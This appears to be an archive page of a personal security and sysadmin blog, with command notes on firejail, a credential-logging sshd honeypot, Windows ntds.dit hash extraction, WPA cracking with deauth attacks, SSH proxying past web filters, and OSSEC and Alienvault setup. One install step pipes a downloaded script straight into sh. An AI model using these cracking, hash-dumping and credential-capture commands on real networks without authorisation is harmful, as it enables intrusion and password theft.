Category Archives: Security And Hacking

Home »  Security And Hacking

admin
Comments Off on Join a firejail session

Sometimes I use firejail…well a lot actually….and I usually just use it for a browser like this: firejail –private google-chrome or this firejail –private google-chrome –proxy-server=”socks5://localhost:8080″ But on a few occasions I want to be able to join ssh to the same sandbox instance…so I do this: firejail –list firejail –join=3452 (or whatever the session you want) Another thing I have ran into is I downloaded something but want to save it before I destroy my firejail (private) session…so I do this: firejail –get=5255 ~/.config/google-chrome/Default/Cookies   You can see more examples and other documentation here: Basic Usage

admin
Comments Off on A little ssh honeypot fun

I say honeypot but really it isn’t a honeypot… but it is something I am using to log/capture data from malicious individuals….so thus the reason I say honeypot. I want to edit sshd to log all user/password attempts. Cent7 yum install git make zlib-devel openssl-devel openssh-devel pam-devel screen autoconf gcc vim-enhanced lsof git clone https://github.com/openssh/openssh-portable.git cd openssh-portable/ autoreconf ./configure vim auth-passwd.c (add in my little log code in the auth_password function) //for Lanix logit(“sshd credentials:%s:%s”,authctxt->user,password); make we are going to use the built-in sshd_config and the current ssh_host_keys to prevent anyone remote being able to easily identify the trap. cp /etc/ssh/sshd_config /root/  (modify this as there are multiple parts we didn’t complile into our ssh and errors will be thrown, also to test I run it first on a different port) cp /etc/ssh/ssh_host_* /root/ chmod 0600 /root/ssh_host_* /root/openssh-portable/sshd -f sshd_config -D (I test with the -D so that I can easily […]

admin
Comments Off on Windows (windblows) password audit notes

Well, it’s that time of the year/quarter/month…. whatever policy you have on performing the password audit…  Some of my notes are from references that are a few years old, so not sure if they will be around much longer, I hope so, they have good info.  Keep in mind I am using kali 2017.1 for my fun today. First Windows password audit, or as I call it, Windblows Password Audit. Retrieve the ntds.dit and SYSTEM file: – notes from https://www.cyberis.co.uk/2014/02/obtaining-ntdsdit-using-in-built.html C:\>ntdsutil ntdsutil: Activate Instance ntds ntdsutil: ifm ifm: create full c:\cool-pass-pentest-audit ifm: quit ntdsutil: quit copy the c:\cool-pass-pentest-audit folder to your kali box install the libesedb-utils apt install libesedb-utils export the ntds tables – notes from https://www.cyberis.co.uk/2014/02/obtaining-ntdsdit-using-in-built.html esedbexport -m tables ntds.dit (this may take a while…a long while) Now we need to extract the hashes…. currently I am using this: https://github.com/csababarta/ntdsxtract git clone https://github.com/csababarta/ntdsxtract.git python ntdsxtract/dsusers.py ntds.dit.export/datatable.4 ntds.dit.export/link_table.6 hashdumpwork –syshive SYSTEM –passwordhashes –lmoutfile […]

admin
Comments Off on SSH proxy through my VM cloud server (using firejail and chrome)

Oh.. you have country blocking turned on at the firewall… or some other web filter or firewall that is preventing you from viewing a website. Keep in mind you do need a server you have access to via ssh… I like cloud servers, they tend to not have web filters..lol First we need to setup the ssh socks5 proxy, we will ssh into our VM (virtual machine server) and proxy through there on local port 8080: ssh -D 8080 myuser@myserver.mydomain Now, keep in mind I am using Kali 2017.1 for this next part but you can use other distros and even configure other browsers to connecto to your localhost:8080 proxy, I am using firejail and google-chrome. Firejail allows me to have an independant isolated browser running so I can still have my regular browser up and running as needed. This is how we connect: firejail –private google-chrome –proxy-server=”socks5://localhost:8080″ Boom, good […]

admin
Comments Off on limit ssh to specific hosts with firewalld (firewall-cmd)

Here is a little reminder on how to limit ssh (or any port really) to a specific IP using firewalld: <code> systemctl start firewalld.service systemctl enable firewalld.service firewall-cmd –zone=”trusted” –add-source=<external IP 1> firewall-cmd –zone=”trusted” –add-source=<external IP 1> –permanent firewall-cmd –zone=”trusted” –add-source=<external IP 2> firewall-cmd –zone=”trusted” –add-source=<external IP 2> –permanent firewall-cmd –zone=”trusted” –add-service=ssh firewall-cmd –zone=”trusted” –add-service=ssh –permanent firewall-cmd –zone=”trusted” –list-all firewall-cmd –zone=public –remove-service=ssh firewall-cmd –zone=public –remove-service=ssh –permanent </code>

admin
Comments Off on How about a little aircrack of wpa?

Make sure you own the network/wireless access point or have permission to attack/break in to the WPA network you are attacking before you start.  In this case I got permission, and I have several witnesses and documentation to support it. First do this to find the network airodump-ng -i wlan1 Focus in on that one network wap and capture the goodies airodump-ng –bssid 00:1E:52:78:AA:5C -c6 –write WPAcrack wlan1 on another interface, do a deauth to force devices to reconnect aireplay-ng –deauth 100 -a 00:1E:52:78:AA:5C wlan2 notice the “WPA handshake: 00:1E:52:78:AA:5C” at the top of the airodump screen? now crack it with this: aircrack-ng WPAcrack-01.cap -w /usr/share/wordlists/dirb/big.txt or by using john the ripper: john –incremental=all –session=WirelessBrute –stdout | aircrack-ng -a 2 -b 00:1E:52:78:AA:5C WPAcrack-01.cap -w – Resume works as well: john –restore=WirelessBrute | aircrack-ng -a 2 -b 00:1E:52:78:AA:5C WPAcrack-01.cap -w – the other I am doing right now john –incremental=all –session=BruteRockSteady […]

admin
Comments Off on Proxy web traffic through your linux server?

sshuttle is a fun little application that basically acts as a quick and easy VPN over ssh. As an ethical hacker you can also use this to proxy your traffic over this connection….think of the possibilities. This is an easy one to setup, first on the server side just make sure you have python installed. Then on the client side you need to have sshuttle installed and on the client side you will need root level access since you are changing routing and firewall rules. Now to actually start routing traffic over ssh: sshuttle -r username@sshserver 0.0.0.0/0 -vv to route dns traffic sshuttle –dns -vvr username@sshserver 0/0

admin
Comments Off on Setup OSSEC agent on a CentOS7 system with Alienvault server

Time to get some OSSEC on and connect an agent to Alienvault…  There is a bunch of people out there that are compiling, and not many using the RPM, or they forget to install both RPMs… wget -q -O – http://www.atomicorp.com/installers/atomic.sh | sh yum install ossec-hids ossec-hids-client add agent config to Alienvault extract key # /var/ossec/bin/manage_client (I – to import the key from Alienvault) modify /var/ossec/etc/ossec-agent.conf (change server ip address) service ossec-hids start chkconfig ossec-hids on On the Alienvault server – restart the ossec server in Environment-Detection-HIDS-Ossec Control

admin
Comments Off on Too many Tickets and Alarms in your Alienvault system?

Working on an Alienvault IDS system, the company that was setting it up made some mistakes and had over 50k alarms and over 50k tickets that they wanted removed.  Time to do some database changes to clear those out. ssh into the alienvault database server or all-in-one server, and jailbreak to the command line. use the ossim-db command: #  ossim-db use the alienvault database: > use alienvault First lets look at the tables involved with tickets – or incidents: > show tables like ‘incident%’; Now mark all the incidents as closed: > select * from incident where not status = “Closed” limit 5; Now look at the alarm tables: > show tables like ‘alarm%’; Now mark all alarms as closed: > update alarm set status = “closed”; Note: notice the incidents use a capitol on Closed, and the alarms use a lower case on closed.

admin
Comments Off on Installing Fusion-io/Sandisk ioDrive2 drivers on CentOS7 with LUKS encryption

I was working on a Mongo database server that was going to be running a Fusion-io/Sandisk ioDrive2 card for wicked speed, and also needed to do on disk encryption…fun task.  I am using CentOS7 and ioDrive2 drivers version 3.2.10.  I wanted auto mounting of the space, so I can have the services start on reboot (after putting in the LUKS password). 1. download drivers from https://link.sandisk.com/Home/SoftwareDownload (may need to make account first) (in this case v 3.2.10) 2. # tar xvf fusionio-files-*.tar 3. # uname -r (now check the binary available does it match your kernel? – mine did not) 4. # cd fusionio-files-*/ioDrive2/Linux_centos-7/3.2.10/Software\ Source 5. # rpmbuild –rebuild iomemory-vsl-3.2.10.1509-1.0.el7.centos.src.rpm 6. # cd ~/rpmbuild/RPMS/x86_64/ 7. # yum install iomemory-vsl-3.10.0*.rpm iomemory-vsl-config-3.10.0-*.rpm iomemory-vsl-source-3.2.10*.rpm 8. # cd ~/fusionio-files-*/ioDrive2/Linux_centos-7/3.2.10/Utilities/ 9. # yum install fio*.rpm 10. # yum install lib*.rpm 11. # mkdir /var/lib/mongo 12. # modprobe iomemory-vsl 13. # dmesg (to vierify that the […]